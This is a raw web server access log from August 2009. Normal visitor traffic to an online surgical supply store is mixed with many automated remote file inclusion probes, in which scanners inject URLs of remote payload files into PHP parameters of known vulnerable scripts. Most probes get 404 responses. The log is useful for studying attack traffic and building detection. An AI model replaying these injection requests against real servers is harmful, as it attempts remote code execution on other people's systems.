217.67.239.230 - - [05/Aug/2009:08:45:36 -0400] "GET /phphtml.php?htmlclass_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.813"
190.144.44.36 - - [05/Aug/2009:08:45:37 -0400] "GET /logs/access_log.Q109070300%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.002mag.com/oneadmin/photogallery/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
190.144.44.36 - - [05/Aug/2009:08:45:37 -0400] "GET /logs/access_log.Q109051000%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.002mag.com/oneadmin/photogallery/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
217.67.239.230 - - [05/Aug/2009:08:46:13 -0400] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.813"
89.108.88.84 - - [05/Aug/2009:08:46:26 -0400] "GET /phphtml.php?htmlclass_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:08:46:31 -0400] "GET /logs/access_log.Q109070100/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 308 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:08:46:31 -0400] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
172.16.1.180 - - [05/Aug/2009:08:46:31 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:46:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:46:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
89.108.88.84 - - [05/Aug/2009:08:46:31 -0400] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 286 "-" "libwww-perl/5.805"
172.16.1.168 - - [05/Aug/2009:08:46:44 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [05/Aug/2009:08:46:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [05/Aug/2009:08:46:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.70 - - [05/Aug/2009:08:46:46 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.70 - - [05/Aug/2009:08:46:46 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.70 - - [05/Aug/2009:08:46:46 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
89.108.88.84 - - [05/Aug/2009:08:46:57 -0400] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
209.59.12.99 - - [05/Aug/2009:08:47:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
75.71.117.63 - - [05/Aug/2009:08:47:19 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
75.71.117.63 - - [05/Aug/2009:08:47:19 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
75.71.117.63 - - [05/Aug/2009:08:47:20 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
75.71.117.63 - - [05/Aug/2009:08:47:20 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
217.67.239.230 - - [05/Aug/2009:08:47:25 -0400] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.813"
89.108.88.84 - - [05/Aug/2009:08:47:29 -0400] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:08:48:16 -0400] "GET /logs/access_log.Q109052300/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 308 "-" "libwww-perl/5.805"
110.45.146.134 - - [05/Aug/2009:08:48:41 -0400] "GET /errors.php?error=http://www.afi.w8w.pl/test.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
110.45.146.134 - - [05/Aug/2009:08:48:41 -0400] "GET /logs/errors.php?error=http://www.afi.w8w.pl/test.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
172.16.1.69 - - [05/Aug/2009:08:48:48 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [05/Aug/2009:08:48:48 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [05/Aug/2009:08:48:48 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:48:50 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:48:50 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:48:50 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
89.108.88.84 - - [05/Aug/2009:08:48:51 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:08:48:51 -0400] "GET /phphtml.php?htmlclass_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:08:48:52 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
172.16.1.70 - - [05/Aug/2009:08:48:57 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.70 - - [05/Aug/2009:08:48:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.70 - - [05/Aug/2009:08:48:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
63.147.72.145 - - [05/Aug/2009:08:49:03 -0400] "GET /logs/access_log.Q109072200/scanhttp://droneh.altervista.org//r0x-id.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
79.23.191.23 - - [05/Aug/2009:08:49:04 -0400] "GET /logs/access_log.Q109071700%20%20/index.php?_SERVER[DOCUMENT_ROOT]=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
172.16.1.176 - - [05/Aug/2009:08:49:13 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:08:49:13 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:08:49:13 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
124.0.232.140 - - [05/Aug/2009:08:49:15 -0400] "GET /logs/errors.php?error=http://www.afi.w8w.pl/test.txt??? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
124.0.232.140 - - [05/Aug/2009:08:49:15 -0400] "GET /errors.php?error=http://www.afi.w8w.pl/test.txt??? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
67.15.48.60 - - [05/Aug/2009:08:49:20 -0400] "GET //?spaw_root=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.810"
67.15.48.60 - - [05/Aug/2009:08:49:20 -0400] "GET /logs//?spaw_root=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 200 12411 "-" "libwww-perl/5.810"
67.15.48.60 - - [05/Aug/2009:08:49:20 -0400] "GET /logs/access_log.Q109060200//?spaw_root=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.810"
110.45.144.61 - - [05/Aug/2009:08:49:20 -0400] "GET /errors.php?error=http://www.afi.w8w.pl/test.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
110.45.144.61 - - [05/Aug/2009:08:49:20 -0400] "GET /logs/errors.php?error=http://www.afi.w8w.pl/test.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
89.108.88.84 - - [05/Aug/2009:08:49:56 -0400] "GET /logs/error_log.Q109052300/phphtml.php?htmlclass_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
211.202.2.220 - - [05/Aug/2009:08:50:09 -0400] "GET /errors.php?error=http://www.afi.w8w.pl/test.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
211.202.2.220 - - [05/Aug/2009:08:50:09 -0400] "GET /logs/errors.php?error=http://www.afi.w8w.pl/test.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
208.113.196.16 - - [05/Aug/2009:08:50:13 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:50:13 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:50:13 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:50:13 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:50:13 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:50:13 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
67.15.48.60 - - [05/Aug/2009:08:50:15 -0400] "GET /logs/access_log.Q109061200//?spaw_root=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.810"
208.113.196.16 - - [05/Aug/2009:08:50:17 -0400] "GET /logs/access_log.Q109062100/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:50:18 -0400] "GET /logs/access_log.Q109062100/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
172.16.1.70 - - [05/Aug/2009:08:50:20 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.70 - - [05/Aug/2009:08:50:20 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.70 - - [05/Aug/2009:08:50:20 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
218.55.227.145 - - [05/Aug/2009:08:50:22 -0400] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
94.23.205.32 - - [05/Aug/2009:08:50:39 -0400] "GET /logs/access_log.Q109052700//?option=com_events&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:08:50:39 -0400] "GET //?option=com_events&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:08:50:39 -0400] "GET /logs//?option=com_events&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 12411 "-" "libwww-perl/5.803"
200.58.196.200 - - [05/Aug/2009:08:50:47 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:50:47 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
172.16.1.180 - - [05/Aug/2009:08:50:50 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:50:50 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:50:50 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
200.58.196.200 - - [05/Aug/2009:08:50:50 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:50:50 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
201.232.54.48 - - [05/Aug/2009:08:51:05 -0400] "GET /logs/access_log.Q109060300/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.otr.co.kr/blog/css/logo_footer.jpg? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.58.196.200 - - [05/Aug/2009:08:51:12 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 46026 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:14 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:14 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:14 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:14 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:14 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:14 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:15 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:15 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:15 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:15 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:15 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:15 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:16 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:16 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:16 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:16 -0400] "GET /images/items/5091000_THUMB.JPG HTTP/1.1" 200 1946 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:16 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:16 -0400] "GET /images/items/5092000_THUMB.JPG HTTP/1.1" 200 2357 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:16 -0400] "GET /images/items/5094000_THUMB.JPG HTTP/1.1" 200 1963 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:17 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:17 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:17 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:17 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:18 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:18 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:18 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:18 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:18 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.58.196.200 - - [05/Aug/2009:08:51:18 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
